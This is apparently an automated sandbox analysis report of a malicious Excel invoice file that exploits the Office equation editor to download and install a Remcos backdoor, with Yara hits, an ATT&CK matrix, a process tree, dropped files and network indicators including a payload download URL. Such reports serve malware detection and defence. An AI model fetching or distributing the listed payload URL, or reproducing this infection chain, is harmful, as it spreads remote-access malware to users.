              Source: Yara matchFile source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR
              Source: outvaunts.exeBinary or memory string: WIN_81
              Source: outvaunts.exeBinary or memory string: WIN_XP
              Source: outvaunts.exeBinary or memory string: WIN_XPe
              Source: outvaunts.exeBinary or memory string: WIN_VISTA
              Source: outvaunts.exeBinary or memory string: WIN_7
              Source: outvaunts.exeBinary or memory string: WIN_8
              Source: outvaunts.exe, 00000020.00000002.500314849.0000000001414000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

              Remote Access Functionality

Source: Yara match | File source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_00876283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, | 5_2_00876283
Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_00876747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 5_2_00876747
Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, | 6_2_013D6283
Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 6_2_013D6747
MITRE ATT&CK Matrix (each tactic column listed with its cells in row order; a number in front of a technique is the count shown in the original cell)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology | IP Addresses | Network Security Appliances | Gather Victim Org Information
Resource Development: 211 Scripting | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising | Compromise Infrastructure | Domains | DNS Server
Initial Access: 2 Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise | Compromise Software Dependencies and Development Tools | Compromise Software Supply Chain
Execution: 2 Native API | 33 Exploitation for Client Execution | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter | PowerShell | AppleScript | Windows Command Shell
Persistence: 211 Scripting | 1 DLL Side-Loading | 2 Valid Accounts | 2 Registry Run Keys / Startup Folder | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task
Privilege Escalation: 1 Exploitation for Privilege Escalation | 1 DLL Side-Loading | 2 Valid Accounts | 21 Access Token Manipulation | 12 Process Injection | 2 Registry Run Keys / Startup Folder | Startup Items | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task
Defense Evasion: 1 Disable or Modify Tools | 1 Deobfuscate/Decode Files or Information | 21 Obfuscated Files or Information | 1 Install Root Certificate | 1 Software Packing | 1 DLL Side-Loading | 1 Masquerading | 2 Valid Accounts | 1 Modify Registry | 1 Virtualization/Sandbox Evasion | 21 Access Token Manipulation | 12 Process Injection
Credential Access: 21 Input Capture | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing | Input Capture | Keylogging
Discovery: 2 System Time Discovery | 1 Account Discovery | 2 File and Directory Discovery | 17 System Information Discovery | 13 Security Software Discovery | 1 Virtualization/Sandbox Evasion | 2 Process Discovery | 1 Application Window Discovery | 1 System Owner/User Discovery | 1 Remote System Discovery | System Network Connections Discovery | Process Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections | Shared Webroot | Software Deployment Tools | Taint Shared Content
Collection: 11 Archive Collected Data | 21 Input Capture | 3 Clipboard Data | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging | Remote Data Staging | Screen Capture
Command and Control: 23 Ingress Tool Transfer | 11 Encrypted Channel | 2 Non-Application Layer Protocol | 113 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols | Mail Protocols | DNS
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Exfiltration Over Unencrypted Non-C2 Protocol | Exfiltration Over Physical Medium
Impact: 1 System Shutdown/Reboot | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement | External Defacement | Firmware Corruption | Resource Hijacking

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph (ID: 1572126, Sample: FACTURA.xlsx, Startdate: 10/12/2024, Architecture: WINDOWS, Score: 100)

Start node: 192.210.150.26 AS-COLOCROSSINGUS United States; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 17 other signatures

Process tree recovered from the graph:

• EXCEL.EXE
  • dropped: C:\Users\user\Desktop\~$FACTURA.xlsx (data)
  • EQNEDT32.EXE
    • network: grupodulcemar.pe 161.132.57.101, 443, 49163 RedCientificaPeruanaPE Peru; www.grupodulcemar.pe
    • dropped: C:\Users\user\AppData\Local\Temp\kudo.exe (PE32); C:\Users\user\...\HKP098767890HJ[1].exe (PE32)
    • signatures: Installs new ROOT certificates; Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    • kudo.exe
      • dropped: C:\Users\user\AppData\Local\...\outvaunts.exe (PE32)
      • signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file
      • outvaunts.exe
        • dropped: C:\Users\user\AppData\...\outvaunts.vbs (data)
        • signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Drops VBS files to the startup folder
        • outvaunts.exe (Binary is likely a compiled AutoIt script file), which starts a chain of five further outvaunts.exe children, each flagged "Binary is likely a compiled AutoIt script file"
• wscript.exe
  • signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  • outvaunts.exe (Binary is likely a compiled AutoIt script file), which starts a chain of seven further outvaunts.exe children



Source | Detection | Scanner | Label | Link
FACTURA.xlsx | 63% | ReversingLabs | Document-Excel.Exploit.CVE-2018-0798 |
FACTURA.xlsx | 45% | Virustotal | | Browse
FACTURA.xlsx | 100% | Avira | EXP/CVE-2018-0798.Gen |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe | 58% | ReversingLabs | Win32.Backdoor.Remcos |
C:\Users\user\AppData\Local\Temp\kudo.exe | 58% | ReversingLabs | Win32.Backdoor.Remcos |
C:\Users\user\AppData\Local\complacence\outvaunts.exe | 58% | ReversingLabs | Win32.Backdoor.Remcos |
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
https://www.grupodulcemar.pe/ | 0% | Avira URL Cloud | safe |
https://www.grupodulcemar.pe/HKP098767890HJ.exe | 0% | Avira URL Cloud | safe |
https://www.grupodulcemar.pe/HKP098767890HJ.exessC: | 0% | Avira URL Cloud | safe |
https://www.grupodulcemar.pe/HKP098767890HJ.exej | 0% | Avira URL Cloud | safe |
https://www.grupodulcemar.pe/m | 0% | Avira URL Cloud | safe |
https://www.grupodulcemar.pe/HKP098767890HJ.exek | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
grupodulcemar.pe | 161.132.57.101 | true | true | | unknown
www.grupodulcemar.pe | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.grupodulcemar.pe/HKP098767890HJ.exe | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/server1.crl0 | EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | outvaunts.exe, 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net03 | EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.grupodulcemar.pe/ | EQNEDT32.EXE, 00000002.00000002.456047137.000000000066B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.grupodulcemar.pe/HKP098767890HJ.exessC: | EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.diginotar.nl/cps/pkioverheid0 | EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net0D | EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
